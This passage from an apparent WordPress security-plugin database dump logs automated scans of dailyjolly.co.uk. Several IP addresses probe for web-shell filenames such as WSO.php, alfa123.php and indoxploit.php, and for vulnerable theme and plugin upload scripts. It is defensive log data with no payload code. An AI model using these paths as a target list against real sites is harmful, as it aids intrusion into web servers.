xPIl80','','19|0|0|0|www.dailyjolly.co.uk/777.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932293.3523,55,'0Y5A2nSylLpa8wrtXFR9gWiC','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932293.9698,55,'4utmH9D7QBG3lrbvK0a1UwZq','','19|0|0|0|www.dailyjolly.co.uk/xox.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932294.5542,55,'4BJ9ZOXYLeGH7WcMT0gzjqih','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932295.1571,55,'nJTKtFmpNgfvy2YLExwQuz1b','','19|0|0|0|www.dailyjolly.co.uk/wi.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932295.7430,55,'qPAej7oEuGt26WrBLYMHQizJ','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932296.3659,55,'VLX27cSThOdry4QsuAwz39WF','','19|0|0|0|www.dailyjolly.co.uk/root.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932296.9692,55,'RXIejmTkJyzBMxin70VFwH6h','','19|0|0|0|www.dailyjolly.co.uk/nee.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932297.5905,55,'4CJosZGp09m27K1DFdnOPh6A','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932298.1607,55,'w2LuSVTXfWHNOnpozcsrID45','','19|0|0|0|www.dailyjolly.co.uk/lol.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932298.8581,55,'hBdeRumbqopcafxTG4KPnEIg','','19|0|0|0|www.dailyjolly.co.uk/87.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932299.4656,55,'rPYVIiyBeOuEnDmHlCGz1wjf','','19|0|0|0|www.dailyjolly.co.uk/7yn.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932300.0534,55,'0YOHcSkzKsAMxhatBPnrwRFj','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932300.6379,55,'h9iRCok60JEOsTKU3wngjH1G','','19|0|0|0|www.dailyjolly.co.uk/13.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932301.2478,55,'tV5EavGz9eQuqHBUlNsfdLib','','19|0|0|0|www.dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932301.8420,55,'rANaQEO3m5CdxHFp84nBb2MU','','19|0|0|0|www.dailyjolly.co.uk/alf.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932302.5065,55,'ignQMRp6HTCqGa9YscKrvyIe','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932303.0974,55,'zKHyeUZ4Qa97xIrlwSRgf2NW','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932303.7185,55,'l1nzfPoxk47Vi0N3hjHIy8gr','','19|0|0|0|www.dailyjolly.co.uk/WSO.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932304.3795,55,'gLHmGkB8lrb1vaOiStFhf0CU','','19|0|0|0|www.dailyjolly.co.uk/hello.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932304.9712,55,'1vsAKFd7MGuzVhg6wYo4TWeU','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932305.5664,55,'Rj8DyeGC0BHJc5swEu3FVtlx','','19|0|0|0|www.dailyjolly.co.uk/kk.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932306.1393,55,'zyPFQkYB1guaTWMb0cnRx8Ur','','19|0|0|0|www.dailyjolly.co.uk/mrjn.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932306.7397,55,'XdOixEWP4U6coQpvCRTzeNur','','19|0|0|0|www.dailyjolly.co.uk/kn.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932307.3136,55,'t9TAmwNJQiDr64KRksc5zhuF','','19|0|0|0|www.dailyjolly.co.uk/3301.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932307.9558,55,'dUcoEPHe6FyJRzq70kDTOLvr','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932308.5502,55,'Y7BDLtCiaWXkAbxFVUGnjESN','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932309.1482,55,'IF6L9wGp5gX7slaDecuJmqhz','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932309.7650,55,'BvzTS8eR1YGojn0qrWbX4cZI','','19|0|0|0|www.dailyjolly.co.uk/anone.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932310.3790,55,'HUG9BIVcxTMAkghtqPemlaO8','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932310.9506,55,'3PxTmepvKybj5kUYqwri12VM','','19|0|0|0|www.dailyjolly.co.uk/wp-ad.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932311.5755,55,'OZGxBIEPejSs73H0MR2kudvr','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932312.1600,55,'rnqVWdYp3gJPhcFvtCb74X2O','','19|0|0|0|www.dailyjolly.co.uk/.wp-cache.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932312.7788,55,'eGkOFnrV4uxUTPbioKMQw3Eg','','19|0|0|0|www.dailyjolly.co.uk/sendmail.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932313.3615,55,'kSfWwebq4l5ZCuKdLJGT2mPH','','19|0|0|0|www.dailyjolly.co.uk/rahma.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932313.9615,55,'SNkmiP8hRWDTI2B1Yvsn645b','','19|0|0|0|www.dailyjolly.co.uk/nasgor.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932314.5377,55,'xyJbrp7fVc9DWUeXZwiqkYO2','','19|0|0|0|www.dailyjolly.co.uk/wp-confirm.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932315.1680,55,'qwAHyuDkPf5jcxlZUaShYmgp','','19|0|0|0|www.dailyjolly.co.uk/alfa123.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932315.7742,55,'j0txuiF8DINQpSVe4CTyYs1v','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932316.3494,55,'KjT0u7HzNhpV9td3PvMgnyCL','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932316.9575,55,'t3RQdXDbx2lAMYNkPLezh51q','','19|0|0|0|www.dailyjolly.co.uk/wp-one.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932317.5858,55,'Vy69D3teJpOjTXgmq4aF5RA1','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('172.174.224.29',2897141789,'',0,1674932318.1655,55,'nidHseYWB260zPlGoQc4yMIp','','19|0|0|0|www.dailyjolly.co.uk/wso1337.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981319.5344,55,'7TVNbQtAIziXMRjEoxm5nLDG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981334.4517,55,'gridh3tLoa92nN8HJWlK7cSA','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/spikes/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981340.1408,55,'S9zilOKodrZbe7JRMpW6uAHG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/onelife/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981377.8038,55,'YPzer3EOwgRFGi9hdx7Xs5p2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/aidreform/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981398.3049,55,'57VYnCZxHydWlJ4vLpaMqeP9','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/spikes-black/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981398.3350,10,'57VYnCZxHydWlJ4vLpaMqeP9','','707|0|0|0|www.dailyjolly.co.uk/wp-content/themes/spikes-black/include/lang_upload.php',0,707,0),('116.203.119.56',1959491384,'',0,1674981403.4404,55,'Rf8tJIu0eHgU72DbYhOly5d4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/westand/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981429.0242,55,'zMpnhsQENiDTaleH5GSjbZRK','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/faith-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981471.9080,55,'tygW1VJYsNkbPqT8I9Mi0HZA','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/footysquare/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981487.3832,55,'THEUaBPK6CXxMjNhF27s0fgn','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/rocky-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981503.7707,55,'RqIzaH0Qye3pbSxulF1sZtrW','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/statfort/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981509.0247,55,'2oftzX9BAVnhy5MPrENOZ8sG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/statfort-new/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981514.0071,55,'65W9Jegbsh2x4caXjwy8GDlm','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/bolster/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981519.3543,55,'2qh5VEyPLCYjuU4WaIR0TZrz','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/kingclub-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981556.9914,55,'wWfl2MtajVDYHhbPT3ILkFeJ','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/soundblast/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981579.2723,55,'pKLo187VJRuwbSvyaEilO4rF','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/churchlife/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981589.8844,55,'fLPc3bpOVszkBFIHJC1rXgMS','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/theme-deejay/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981628.1104,55,'Q2aGLRVNTEtrgBOn1I8SA3bU','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/soccer-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981639.4243,55,'gGJXzMOTajcVypdvKmNiEFIR','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/bolster-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981644.6595,55,'o9yYLurwX1ESRUOj45x3vA0f','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/club-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674981654.8824,55,'QoBS8cTXAjYCfI6atlwRPyv2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/snapture/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982854.5847,55,'dIVf7btxO29XwzyWgAHl6j8K','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982870.8658,55,'arK1Qd9IWCBfsj0ctVu3EALZ','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/spikes/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982876.1798,55,'a8PYQ4dL5NWx3KlpO7Xn2iZv','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/onelife/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982916.0409,55,'Wn59wVvqd7bGF4eIP2lMz8Uh','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/aidreform/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982938.2276,55,'O4yGDhkE0dbFXvcfn2M73Z89','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/spikes-black/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982943.5904,55,'wmzTYIxHK6fdOykqAVeuPc7p','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/westand/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674982972.5443,55,'Y4QEvwlFmBG6MyqRK2UXzA0p','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/faith-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983019.0762,55,'B1n2qvwPVsTuaylIJN0x6F9K','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/footysquare/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983036.1938,55,'Jc7eUmLPVSn6w4pz5aMhyT8k','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/rocky-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983052.4006,55,'Fxn872SwqB91hdkOuHVrm3fj','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/statfort/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983057.3081,55,'YSoCpTwXR0Fe1JInWlGiKrv9','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/statfort-new/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983062.7064,55,'6ptCFhB07uXUWcYSOQ3dmPs9','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/bolster/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983068.2929,55,'N6fp14rhmZqGoRdQAsHxgWOB','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/kingclub-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983108.7746,55,'iRUwuGk5HPnOcLXdxpylgfo4','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/soundblast/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983131.7616,55,'ZmL6DMkSw2BxWulEXITKHeJc','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/churchlife/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983142.7565,55,'fOsVAvozYndwhtTeFaxc6H0I','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/theme-deejay/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983182.9841,55,'Bbl7g5pzSVXEHR2FQhyeIdDv','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/soccer-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983194.1598,55,'p7BKUiXVxbuGfDjnJq5aZyPm','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/bolster-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983199.9396,55,'slwihEu2DgXUjaVAm65GNLc4','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/club-theme/include/lang_upload.php',0,19,0),('116.203.119.56',1959491384,'',0,1674983211.0077,55,'q1bjr8wDKgufV6PzHQs9OMx7','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/snapture/include/lang_upload.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003698.6275,55,'mUV19Y0O7RJuX5NbDSgfzQPp','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003698.8777,55,'DbhGOtnKgoXcveAEPiVrB79Y','','19|0|0|0|www.dailyjolly.co.uk/wp-setups.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003699.1247,55,'Yv1lHxyo6rCU9b0dzAXQ8Nua','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003699.3688,55,'qCwGy5om0YikuWRseDnNF47O','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003699.6042,55,'pVGcqj25B1QK7mdXHM9ONTUZ','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003699.6364,10,'pVGcqj25B1QK7mdXHM9ONTUZ','','707|0|0|0|www.dailyjolly.co.uk/admin.php',0,707,0),('75.119.157.105',1266130281,'',0,1675003699.8762,18,'KLklwM7YzGp53cyCeE6BhUZN','','13|0|0|0|www.dailyjolly.co.uk/admin.php',0,13,0),('75.119.157.105',1266130281,'',0,1675003700.1031,100,'bhFzD7dQ86VixcvUCelky3wr','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('75.119.157.105',1266130281,'',0,1675003700.3233,18,'y8uNl9wA12f5WXPaIKcUgLOV','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('75.119.157.105',1266130281,'',0,1675003700.5665,55,'wQCG1MUu4Aldcsho3Tq6LNHY','','19|0|0|0|www.dailyjolly.co.uk/simple.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003701.2632,55,'w4nuMOYlSQtx8fhb3KgDNUqC','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('75.119.157.105',1266130281,'',0,1675003701.5327,55,'9xQWGchuzyKVOwEJ0AN7raZL','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('193.42.33.150',3240763798,'',0,1675025660.8652,55,'ELZuvCz5VIJBsobQkPFaeYmh','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('193.42.33.150',3240763798,'',0,1675025750.1049,55,'SB5jCHRNTOJqAMPduzsy36pK','','19|0|0|0|dailyjolly.co.uk/wp/wp-content/plugins/core-stab/index.php',0,19,0),('193.42.33.150',3240763798,'',0,1675025807.7302,55,'2u9DdSt5rI3pqmPLxFgVkMfb','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-content/plugins/core-stab/index.php',0,19,0),('193.42.33.150',3240763798,'',0,1675025899.7925,55,'0mQfkz8FaTNdcu6rPnbHSlIO','','19|0|0|0|dailyjolly.co.uk/blog/wp-content/plugins/core-stab/index.php',0,19,0),('193.42.33.150',3240763798,'',0,1675025992.8760,55,'cB3yIGStEx8izLVs4eHPuRdp','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/core-engine/index.php',0,19,0),('193.42.33.150',3240763798,'',0,1675025992.9321,10,'cB3yIGStEx8izLVs4eHPuRdp','','707|0|0|0|dailyjolly.co.uk/wp-content/plugins/core-engine/index.php',0,707,0),('193.42.33.150',3240763798,'',0,1675026111.3445,55,'JPsDG1XhFiNzaeUp5BZyK2mq','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wpyii2/wpyii2.php',0,19,0),('193.42.33.150',3240763798,'',0,1675026158.4583,55,'0msYUkyTagXwNDdWhBCue7J1','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wpzip/wpzip.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045817.4631,55,'5ta1XLjqdYTmIRnGfblFwhZy','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/colors.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045817.8502,55,'ofJ0PD4eZYNHvVXWQltcuyS7','','19|0|0|0|dailyjolly.co.uk/wp-includes/user-handler.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045818.4066,55,'3qztwIaEdYefmjxMgDs4LNy9','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-includes.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045818.6815,55,'1RyC7i8XnMs9xeDPTZdBq3Jr','','19|0|0|0|dailyjolly.co.uk/wp-instance.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045819.3426,55,'6AGoTlnQwz0kvPmutMfCHWVD','','19|0|0|0|dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045819.4034,10,'6AGoTlnQwz0kvPmutMfCHWVD','','707|0|0|0|dailyjolly.co.uk/wp-content/wp-content.php',0,707,0),('158.69.23.79',2655328079,'',0,1675045819.4420,55,'8MBPV5cJTxDFQ17SZpjnhWar','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/ultra-cache/index.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045820.1964,55,'TJNPOxqkLhbwVyEUlZHtGWIR','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/all-in-one-wp-migration/lib/model/export/module.php',0,19,0),('158.69.23.79',2655328079,'',0,1675045820.2615,100,'Im5rlKg0UPFaobQnLjfA3WGT','','13|0|0|0|dailyjolly.co.uk/wp-admin/wp-admin.php',0,13,0),('185.150.191.81',3113664337,'',0,1675047310.4555,55,'Dkw3H4bd6N5xIhcaBGpWsq8X','','19|0|0|0|www.dailyjolly.co.uk/wp-plain.php',0,19,0),('185.150.191.81',3113664337,'',0,1675047313.4758,55,'dBWga1yTn4068EvOM5JuQIrk','','19|0|0|0|www.dailyjolly.co.uk/vlcunlph.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053663.3194,55,'LGzcfuF6ITBMx1WgnrmDSbdK','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053663.7166,55,'8E7PVcAtXLCxbiO3DZrn61vd','','19|0|0|0|www.dailyjolly.co.uk/wp-setups.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053663.9723,55,'Mu6NfJyYjqHRsVzBp3eK2Sl5','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053664.0604,55,'aPFdU2yWVeBRub3sjfn0Dl8o','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053664.2154,55,'h9BJalecSTMXQ36t0RFdIYOn','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053664.7085,55,'ySn9daQX2bAtFP7pzE3KHO45','','19|0|0|0|www.dailyjolly.co.uk/wp-setups.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053664.8976,55,'sPX5OevNiabthnTDgy8LfmjM','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053665.0921,10,'sPX5OevNiabthnTDgy8LfmjM','','707|0|0|0|www.dailyjolly.co.uk/admin.php',0,707,0),('89.39.107.6',1495755526,'',0,1675053665.5370,18,'qrZyG6Mu3b8W7vA2smfhKDdL','','13|0|0|0|www.dailyjolly.co.uk/admin.php',0,13,0),('89.39.107.6',1495755526,'',0,1675053665.8364,100,'A4N0VI1FX37i6DHBoqUTcbPl','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('162.244.33.54',2733908278,'',0,1675053666.1968,55,'SgRjMQh9HZqOzcwCAprJau08','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053666.2478,18,'rQliTxtnDUCLmhyqzO65dPIe','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('89.39.107.6',1495755526,'',0,1675053666.6126,55,'FpAoBhtNdS9eVkKcXunjrxs1','','19|0|0|0|www.dailyjolly.co.uk/simple.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053666.9945,55,'Qb9K2rU1u0SfJZaTjwWNG5nR','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053667.4671,55,'5ZGEUeOHoij7Mayt1Q06Bbc4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('89.39.107.6',1495755526,'',0,1675053667.7061,55,'sgBDKOxvcGeuYIJ9qylTCF7d','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053667.7846,55,'JR7QEpN3UV9Zo2ri51hmHtWP','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053667.8108,10,'JR7QEpN3UV9Zo2ri51hmHtWP','','707|0|0|0|www.dailyjolly.co.uk/admin.php',0,707,0),('162.244.33.54',2733908278,'',0,1675053668.4357,18,'cdGjeXmBZ5lCAKJMnupo8vLt','','13|0|0|0|www.dailyjolly.co.uk/admin.php',0,13,0),('162.244.33.54',2733908278,'',0,1675053669.0839,100,'HRdUmhtTufnIYL06xeZsSFJ3','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('162.244.33.54',2733908278,'',0,1675053669.8663,18,'Pusz9rDg6im0eVMZyYQb4LWS','','13|0|0|0|www.dailyjolly.co.uk/wp-story.php',0,13,0),('162.244.33.54',2733908278,'',0,1675053670.5110,55,'yqvaAZdXosYP6c94J3ThjlFb','','19|0|0|0|www.dailyjolly.co.uk/simple.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053672.0689,55,'QGbyku83LYjOfxwZnz2UJrvq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('162.244.33.54',2733908278,'',0,1675053672.6905,55,'46KSwIk18diHnfMYvEtzhuDr','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088307.9629,55,'dMc8bxPfys0vaorHqOu65e7g','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('51.77.78.41',860704297,'',0,1675088309.2615,55,'WV2zjHxycUKA4E6NI7dkvbCL','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('51.77.78.41',860704297,'',0,1675088310.4598,55,'FmQjlX0zSJ5wY4datC2GPkM8','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088311.5930,55,'JvQqyw64K0bSzhRxcEAY1fVr','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088313.0010,55,'BVt4fzuC2Oeig63wGTAhZr9P','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('51.77.78.41',860704297,'',0,1675088313.0487,10,'BVt4fzuC2Oeig63wGTAhZr9P','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('51.77.78.41',860704297,'',0,1675088314.2274,100,'PKXWb3uwTfL4dR5qckCO0n9S','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('51.77.78.41',860704297,'',0,1675088316.9084,55,'Y58qv3SFhzkfpnDNPgGoQAte','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('51.77.78.41',860704297,'',0,1675088318.0327,55,'N2g6cjZARhMUHEy9sGx0CqYX','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('51.77.78.41',860704297,'',0,1675088318.8411,55,'vQirsMfbh5uTaIqp2toBZx1l','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('51.77.78.41',860704297,'',0,1675088327.9162,55,'2MOclmfWNCdKqtakzQIyXY87','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('51.77.78.41',860704297,'',0,1675088328.8683,55,'R1Gr2Oi73MjUN5n6oZzAYw0L','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('51.77.78.41',860704297,'',0,1675088330.1739,55,'qjZNHtuP9beRVO3lahCUzcQm','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('51.77.78.41',860704297,'',0,1675088331.0592,55,'4oB8FVWyN7RGub6ZafmDPST9','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('51.77.78.41',860704297,'',0,1675088331.7592,55,'wKkZqS2YfrDGBLXWpPA4QHi8','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('51.77.78.41',860704297,'',0,1675088332.2992,55,'eoVi2MzWOkySQ1Gwgmxu7J8Z','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('51.77.78.41',860704297,'',0,1675088333.0845,55,'yDkzm13gaL4RMQYAeBZsvdXi','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('51.77.78.41',860704297,'',0,1675088333.6207,55,'6s4wFYBceCq7WndKgTPOahmE','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('51.77.78.41',860704297,'',0,1675088334.1950,55,'emcCZTwX6xSQMLsA3UrRNol4','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('51.77.78.41',860704297,'',0,1675088335.2101,55,'kKp7IdPoaiC4lARg23eYFzwx','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('51.77.78.41',860704297,'',0,1675088335.9536,55,'l7t6IJROQYK5BwCGdv3oH0TM','','19|0|0